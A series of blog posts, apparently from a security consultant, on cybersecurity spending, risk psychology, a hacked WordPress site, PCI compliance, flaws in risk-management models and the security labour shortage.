How much should I spend on Cybersecurity?

I want to discuss 2 articles and then answer the question on the title.

http://www.theguardian.com/small-business-network/2015/mar/24/hackers-cyberwar-businesses-cybercrime

{Hackers are winning the cyberwar and businesses are all too often simply hoping for the best, according to many security experts. }

anonymousgreenscreenqz.com

Cost of Cybercrime in UK is £18-27bn … supposedly.  This could actually be low, since many people do not discuss cybercrime. But if people are not discussing this crime because of embarrassment or other reasons (PR), then how can we actually tell what is really happening?

What can we actually attribute to real cybercime?

{He also alleges that some financial institutions have been compromised and have lost millions, but have kept this information under wraps. “In the past 10 years there has been at least one UK-based building society, which no longer exists, which lost about £50m to what was called a ghost transaction.}

There is very little hard data. and some cyber crime is attributed to potential IP crime (Intellectual Property)

The biggest threat is from organised gangs looking to steal data and IP from companies, which they can then exploit on the black market. The hackers are typically based overseas where authorities are less effective at preventing them.

Then I am revisiting my old post of http://oversitesentry.com/the-psychology-of-security/

Humanity is risk averse when it comes to gains and risk seeking when it comes to losses.

“Security is a tradeoff,” Schneier said, speaking to a packed audience at his RSA session. “What are you getting for what you’re giving up? Whether you make that tradeoff consciously or not, there is one.”

 

This is a very important concept to understand:

Humanity is risk averse when it comes to gains – the masses as a whole are risk averse if a choice of higher risk with higher gains versus lower risk and lower gains. we move to the lower risk choice.

Risk seeking when it comes to losses.  (even to the point of most people do not wear bullet proof vests, including police officers)  This means that when one has a choice of an action where one choice is to spend money and potentially lose something or spend less money and potentially lose more we will choose the 2nd one more often.

So coming back to the question:   How much should we spend on cybersecurity?

I can’t really say “we” now, because as a cyber security professional I will spend more on it then you will, since I can’t get hacked period. I will spend whatever time and resources necessary so that my computers and websites are not hacked.

You or your peers do not fear or understand the true nature of the cyber challenges that we have. So my question is this:

How much should a non-IT pro spend on cybersecurity?

 

For me to answer this correctly, I want to go back to the regular world and spend a little time in stating how much we spend on physical security. For one, we spend a certain dollar amount on our physical locks and key systems. For computer rooms we spend money on keycards and security people watching cameras.  So obviously a camera and the labor for the security person is reasonable even in areas where there is little if any crime.

Why hire security people, buy security cameras, biometric security devices… Etc? Will they be truly used once or twice to catch an actual criminal? Or is it part of the feeling of security that one wants for computer systems in a computer room?

biodevice2image from bioenabletech.com

 

biometricdevice  image from biometricdevices.blogspot.com

 

Biometric devices cost from $100 to $2000 and they have to integrate within a security system hardware/software combinations, so the cost will likely rise to several thousand dollars up to $10,000 with installation and training, but the reality is that an actual criminal will likely not attempt a physical attack on a computer room.

So should we make a comparison of potential security risks?

How accurate will the cybersecurity risk assessment be?  On top of all of this the only real statistic is whether one gets breached or not.

The reason everyone is getting hacked is that no one sees anybody actually get breached except for the well publicized attacks. So no matter what I would conjecture here, your perception is what matters.

 

And now we get back to the psychology of humanity with risk seeking when it comes to losses. So the reality is you will discount the scares and potential security problems and take a chance if you think there is higher risk in doing nothing.

Now we know why most businesses will get hacked period.  You have to go against the psychological grain to spend more money on security.

Contact us to help you decide.

 

 

Value of a Hacked Website

http://blog.sucuri.net/   has an interesting post about “The Impacts of a Hacked Website”

This is a good line:

 

We are learning the hard way, what large organizations already learned – being online is a responsibility and will eventually cost you something.

I now know that it was the Yoast  Google Analytics plug-in that caused this website to get hacked http://oversitesentry.com/after-action-report-on-my-hacked-wordpress-fixvirus-com/   I had installed the Yoast plug-in and then a little black box was suddenly on my site.

closeupofdothackedsite

After installing Yoast I did not realize it had a weakness:

http://seclists.org/fulldisclosure/2015/Mar/136   Apparently there was a security vulnerability

{ A security vulnerability in the plug-in allows an unauthenticated attacker to store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. }

That is just the beginning in this analysis:

A hacked site can cause problems for you

1. To me the biggest problem is that Google will blacklist your site, you will not get any traffic.

I ran into that myself and was able to solve this very quickly, Google does fix the listing when you clean the malware

2. It can happen even to sites that have “nothing important” on them.

3. Brand reputation is a tough  nut to get back.

4. Hacks cost more than money(may also cost some money). The mental cost of having to fix or just the fact it was hacked.

 

For me the only problem was I had to move hosting companies that was going to be a lot of work which I was putting off.

If you have not gotten the message yet I am honest to a fault. I will tell you everything I know and then some stuff you might not want to hear.

In security that is the most important  aspect.

In wordpress I have learned to use Sucuri wordpress plus a backup plugin. Now that I am on a hosting company with Cpanel, I can control the site very well. With the Sucuri plugin any time a change occurs on the site an email is sent to my email. So that is like a change control.

 

PCI Compliance is not Computer Security

PCI compliance has the basic settings for computer security but it will not ensure your corporation will be secure.

For that to happen you must have personnel that implement security policies correctly, and it must be ingrained in all employees, as the weakest link is in our employee actions day after day.  It is difficult to make no mistakes day after day.

So we use technology to help us implement computer security.

We can use IDS, an Intrusion Detection System or an Intrusion Prevention System to set up  a network architecture plus anti-virus software on the desktop to set up a layered defense of the Networked computers.

 

 

 

PCIcompliance11.3

 

 

This section of the PCI DSS standard section 11.3 is the pentesting requirement for PCI compliance.

Why is pentesting a requirement? because no matter what you think you have it is always good for someone to try and break into the security to give an added level of security. The idea is that any misconfigured  systems or other types of mistakes will be caught by the pentesters and then those misconfigurations can be fixed.

best practices section:

pcibestpractices

Even with all of those items in place a good training program for preventing social engineering of your employees will be important to achieve.

Since that is the #1 reason for a beachhead in the initial attack. And with that initial attack the hacker will slowly try and leverage the initial compromise into more access until finding a system with some worthy information.

 

As I mentioned in this Post:

http://oversitesentry.com/why-risk-management-model-failed-us/

The problem we need to teach employees is that any mistake can start the slow creep and eventual avalanche of security problems.

Everyone that clicks on websites and email is a potential risk. So even with PCI compliance the security of your company data or customer data is still at risk.

failed-risk_management_model

There is a problem in our security profile standardized thinking:

1. Only taking care of the network and desktops will not completely secure the environment

2. Making all employees aware of social engineering

3. Increasing the IT knowledge of all employees

4. Home vpn connections into the corporate environment can also cause security problems.

5. Any vendor with access to your network could be a security liability.

 

 

It goes without saying that any potential problem can bloom into a full-fledged disaster within a few days to weeks.

Why Risk Management Model Failed Us

failed-risk_management_model

 

Why has Risk Management  failed us?

Every place you see “Accept risks” replace with Hacked computers.  JP Morgan proved this concept even with a seeming unlimited security and IT budget, some mistakes creep into the organization.

76 million accounts affected

Every box with monitor and manage risks replace with Computer hacked from the internal network.

 

Here is the relevant sentence from the Wall Street Journal Article:

{Hackers appear to have originally breached J.P. Morgan’s network via an employee’s personal computer, a person close to the investigation has said. From there, the intruders were able to move further into the bank’s systems. Employees often use software to tap into corporate networks from home through what are known as virtual private networks.}

 

I wonder if your “extensive management crucial” box can defend from an infected or hacked computer in the internal network?

We must ASSUME the hacker is in the network already.

 

In theory we protect the highest risk and highest impact computers but they are not necessarily being protected from the inside and from all threats.

 

Why else have there been so many hacked networks? because not all the computers are being protected as they should, and inevitably somewhere someone makes a mistake and then the hacker is in.

Once the hacker is in your network it has been a fact of life that it takes 220 days to find the breach. In 7 months a hacker can crack the rest of the machines.

We must move to a different risk management Model:

systemsengineeringprocess

 

 

The one where we exchange the “Model the system” with  All the computers one at a time no matter what.

Riskmanagmentsystemsprocess

It is really much simpler than the complex risk management process, and  it is time for us to institute a simpler process, which invites less errors and easier to manage all around.

 

We can also insert things like Test the machine with Nessus or Qualys vulnerability scan every time a change is made in the “re-evaluate” box.

 

 Contact Us to discuss how we can help.

 

 

#Cybersecurity hiring problems?

How can we most efficiently solve a labor shortage in Cybersecurity?  We can’t hire robots(Lely Vector) like in Dairy farms:

lilyvectordairyrobot

Where automation replaced jobs that were not being filled by mostly immigrant labor(80%).

Don’t get me wrong we should automate as much as possible, since that will help with our IT security positions. Definitely use scripting and automated techniques in our vulnerability scanning. But at some point the logs need to be checked or an email sent to investigate a potential problem (this may have done Target breach in)

At some point a human has to receive the alert or review the log that was automatically generated,

There are many articles out that discuss the IT security labor shortage.

Networkworld.com has the story:

http://www.networkworld.com/article/2893653/cisco-subnet/endpoint-security-meets-the-cybersecurity-skills-shortage.html

This story discusses an aspect of IT security which is the endpoint labor shortage, and it is not even the high risk incidents but the following:

When asked to identify their top endpoint security challenges, 38% of enterprise security professionals stated that their organization’s endpoint security staff spends too much time attending to high-priority issues and not enough time on process improvement and strategic planning.

So even in critical fix environments many organizations are not performing the process improvements to handle new attacks.

On Friday our blog post attempted to start a conversation http://oversitesentry.com/improve-cybersecurity-lets-teach-more-infosec/

The  endpoint is only one aspect of IT security though. In an enterprise environment there are multiple departments that require years of experience:

  1. Firewall Operations also network security(including ACL – Access Control Lists)
  2. Endpoint Security Software operations( the infrastructure for endpoint security has its own challenges
  3. Forensics (For endpoint after a loss or breach someone has to clean and review)
  4. Vulnerability Scanning (Scan the network to see what the computers are doing)
  5. Web application scanning( Web applications must be scanned)
  6. Penetration testing(there are some pentests that must be performed for applications)
  7. Security Operations (must have infrastructure support of whatever device manufacturer of the IDS/IPS systems)
  8. Threat intel (this department looks at specific threats coming into the organization)
  9. IT Security Management (there is Directors, Executives and Managers)

 

So the way to fix our labor shortage is to get everyone in IT up to speed  to train our current IT staff and hire more IT staff in general.

If there need to be specialists in networking security or operations then those need to be hired specifically for certain slots.

But what the article is talking about is the major labor shortage in endpoint security, otherwise we get the following messages:

cryptowall2.0message

This message is a cryptowall2.0 message(last year-2014), unfortunately Cryptowall has evolved into a more deadly version.

On Feb 26 the blogpost discussed the difficulties in an enterprise environment http://oversitesentry.com/how-do-we-improve-security/

win2006xpupdate

Cryptolocker3.0 has returned with streamlined dropper:

http://www.v3.co.uk/v3-uk/news/2394598/cryptowall-30-ransomware-returns-with-streamlined-dropper

This is the Cisco Group which discussed the details of Cryptowall3.0: http://blogs.cisco.com/security/talos/cryptowall-3-0

How can we teach more IT security people to understand the methods and how to prevent Cryptowall3.0?

We have to teach the Security basics so that the details can be understood. Most of all we must learn to do this is to do the right thing:

Filotimo – Greek for friend of Honor Youtube video (regarding ΦΙΛΟΤΙΜΟ)

http://youtu.be/DaPF4_-gH4g

 

Contact Us to help you in your IT Security Career direction

http://oversitesentry.com/mentoring-future-it-cybersecurity-ethical-hackers/